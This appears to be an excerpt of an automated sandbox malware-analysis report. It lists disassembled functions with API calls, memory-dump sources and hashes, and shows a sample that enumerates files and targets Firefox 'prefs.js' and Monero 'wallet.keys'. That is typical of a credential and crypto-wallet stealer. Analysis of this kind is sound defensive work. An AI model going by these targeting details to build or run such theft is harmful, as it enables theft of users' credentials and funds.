                                  • Opcode Fuzzy Hash: ea183089f946b29c16050c337732f758ed8d3eff73b4fa32b4412b2e9f0de415
                                  • Instruction Fuzzy Hash: 89A12FB1A0020C9BDB24DFA4DC89FFE7378BB88300F044698B61D96291DB749B85CF61
                                  Function 007F4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 007F4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                  • StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                  • StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 0069227a3f0e69437ea995e84b04ac401b071c28316cae033d33b7027b57fa28
                                  • Instruction ID: 2315843b1724fdd017976a20dd0bd211b4282ccf9adebde5f90c7a07e2de835d
                                  • Opcode Fuzzy Hash: 0069227a3f0e69437ea995e84b04ac401b071c28316cae033d33b7027b57fa28
                                  • Instruction Fuzzy Hash: 226137B1904219ABCB24EBE4DC49FEE737CBB88700F004698F61996191EF749B85CF91
                                  Function 007F47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F47D7
                                  • wsprintfA.USER32 ref: 007F47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F480D
                                  • StrCmpCA.SHLWAPI(?,00800FAC), ref: 007F483B
                                  • StrCmpCA.SHLWAPI(?,00800FB0), ref: 007F4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F48DB
                                  • FindClose.KERNEL32(000000FF), ref: 007F48F0
                                  • lstrcat.KERNEL32(?,0145E300), ref: 007F4915
                                  • lstrcat.KERNEL32(?,0145D438), ref: 007F4928
                                  • lstrlen.KERNEL32(?), ref: 007F4935
                                  • lstrlen.KERNEL32(?), ref: 007F4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: e59be691b07a1ecdefc3c0ab969cf2d5752384ee5ac74e54f44f7610b42434d7
                                  • Instruction ID: 0bd46a94fccfe150e1df24c886e81d3dcfc49c6b03555ced1a0bcd062a9391ba
                                  • Opcode Fuzzy Hash: e59be691b07a1ecdefc3c0ab969cf2d5752384ee5ac74e54f44f7610b42434d7
                                  • Instruction Fuzzy Hash: 385167B150421C9BCB64EBB4DC89FEE777CAB58300F404688F619961A1EF749B85CFA1
                                  Function 007F40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 007F4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F412A
                                  • StrCmpCA.SHLWAPI(?,00800F94), ref: 007F4158
                                  • StrCmpCA.SHLWAPI(?,00800F98), ref: 007F416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F42BC
                                  • FindClose.KERNEL32(000000FF), ref: 007F42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: e29230db9f05ad3dbeb5d4e2e5b0d2c00f994d21d1e8c9f07ec651119a710c83
                                  • Instruction ID: 36b7201f5afa39b36ce3a80b62dcc870f6c9c532824bcfecb8eb5896fda9a9d5
                                  • Opcode Fuzzy Hash: e29230db9f05ad3dbeb5d4e2e5b0d2c00f994d21d1e8c9f07ec651119a710c83
                                  • Instruction Fuzzy Hash: 7D5158B150421CABCB24EBB0DC49EFE737CBB58300F404699B71996191EB759B898F51
                                  Function 007EEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 007EEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007EEE55
                                  • StrCmpCA.SHLWAPI(?,00801630), ref: 007EEEAB
                                  • StrCmpCA.SHLWAPI(?,00801634), ref: 007EEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 007EF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: e131cdf9b8d4c98e5bd818593ca4ef6396a36e0d9e3354831733e90ce58d0298
                                  • Instruction ID: e85046e59ddf9f1f40694a2be51fe87042a9ffc298a2b2e590f3154866710bb5
                                  • Opcode Fuzzy Hash: e131cdf9b8d4c98e5bd818593ca4ef6396a36e0d9e3354831733e90ce58d0298
                                  • Instruction Fuzzy Hash: 14E111F291121CEADB54EB64CC66EFE7339AF54300F4045D9B50A62192EF386B89CF61
                                  Function 00820098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 579358f090c7f8ff789d17469a37a628e7a35225d4989b43f4e72cb9758a6bbd
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: A6E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  Function 007EF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008016B0,00800D97), ref: 007EF81E
                                  • StrCmpCA.SHLWAPI(?,008016B4), ref: 007EF86F
                                  • StrCmpCA.SHLWAPI(?,008016B8), ref: 007EF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 007EFBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c88cf6f24596ac465e03a537c4905f90591d78cb8ed6fcd5b93d1b80c831f99f
                                  • Instruction ID: 7cdb887fcb2c50a5b5c06d035426b8372bdac690902179ac6329ec012fc94176
                                  • Opcode Fuzzy Hash: c88cf6f24596ac465e03a537c4905f90591d78cb8ed6fcd5b93d1b80c831f99f
                                  • Instruction Fuzzy Hash: E4B126B1A00158EBCB24EF64DD9AEFD7379AF54300F4085A8E50E57291EF345B49CB52
                                  Function 007E1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0080523C,?,?,?,008052E4,?,?,00000000,?,00000000), ref: 007E1963
                                  • StrCmpCA.SHLWAPI(?,0080538C), ref: 007E19B3
                                  • StrCmpCA.SHLWAPI(?,00805434), ref: 007E19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 007E1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007E1E60
                                  • FindClose.KERNEL32(000000FF), ref: 007E1E72
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 9d1b1bbe90875303620139fb57b4d8f79e02cef3c43337a65134e8d1aea5a732
                                  • Instruction ID: ccb5cbe2a6f25635c3185f0ef19e8837821e61efaf67546605021ad5114a57f1
                                  • Opcode Fuzzy Hash: 9d1b1bbe90875303620139fb57b4d8f79e02cef3c43337a65134e8d1aea5a732
                                  • Instruction Fuzzy Hash: 9312C1B191011CEBCB15EB60CC6AAFE7379AF54300F4045D9B61E62291EF786B89CF61
                                  Function 007EDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00800C32), ref: 007EDF5E
                                  • StrCmpCA.SHLWAPI(?,008015C0), ref: 007EDFAE
                                  • StrCmpCA.SHLWAPI(?,008015C4), ref: 007EDFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 007EE4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 8ccf0fe680854ae5c3ed343b18e314ff0390eb514bc59aecf1e0e66d9caa97fc
                                  • Instruction ID: 1f12147205f70e2732542b5b6ba1229c52c82636ac045a8fa4a73da5592b7377
                                  • Opcode Fuzzy Hash: 8ccf0fe680854ae5c3ed343b18e314ff0390eb514bc59aecf1e0e66d9caa97fc
                                  • Instruction Fuzzy Hash: 5BF1ADB191411CEACB15EB60CDAAEFE7339BF54300F4045D9A21E62291EF386B49CF65
                                  Function 00C3714D Relevance: 14.1, Strings: 10, Instructions: 1616COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (lE$4~~$7\[$7{g9$C&{$^no{$y'N3$y'N3$*>{$x#
                                  • API String ID: 0-989139672
                                  • Opcode ID: 077db60a536bd58a201e51fd8ee7ed393a1d6da7a9240e59882ff1c7f85fec89
                                  • Instruction ID: a54ad9d77938eeff365a3f439f4a0ebfb376455cbae355e0a2d4912d0dc1f014
                                  • Opcode Fuzzy Hash: 077db60a536bd58a201e51fd8ee7ed393a1d6da7a9240e59882ff1c7f85fec89
